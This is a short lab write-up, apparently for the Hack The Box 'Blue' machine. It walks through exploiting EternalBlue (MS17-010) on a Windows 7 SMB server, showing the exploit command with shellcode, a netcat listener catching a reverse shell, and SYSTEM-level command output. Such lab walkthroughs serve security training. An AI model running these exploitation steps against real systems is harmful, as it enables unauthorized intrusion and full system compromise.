InfoSec LAB

Blue_Exploitation

Created: 2 min read

EternalBlue

I initially thought that something was wrong with the machine because it only had a misconfigured SMB server up and running. It also appeared that there had never been any user signed in to the system based on the enumeration made. then i looked at the name of the machine, and decided to check for vulnerabilities on the smb server itself. that’s when i realized that the target smb server is vulnerable to [[blue_cve-2017-0143#cve-2017-0143 / MS17-010|EternalBlue]]

┌──(kali㉿kali)-[~/…/htb/labs/blue/MS17-010]
└─$ python2 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin 
shellcode size: 2203
numgroomconn: 13
target os: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Launching the exploit with the payload

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/blue]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
haris-PC
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::647e:9dcb:b0b5:d3e6
   Temporary IPv6 Address. . . . . . : dead:beef::60bf:2d1e:9506:67bc
   Link-local IPv6 Address . . . . . : fe80::647e:9dcb:b0b5:d3e6%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%11
                                       10.10.10.2
 
Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Teredo Tunneling Pseudo-Interface:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Although the x86 payload was never executed, I got a connection back on the port 1234, which was hooked up to the x64 payload System Level Compromise

Interactive Graph View

Backlinks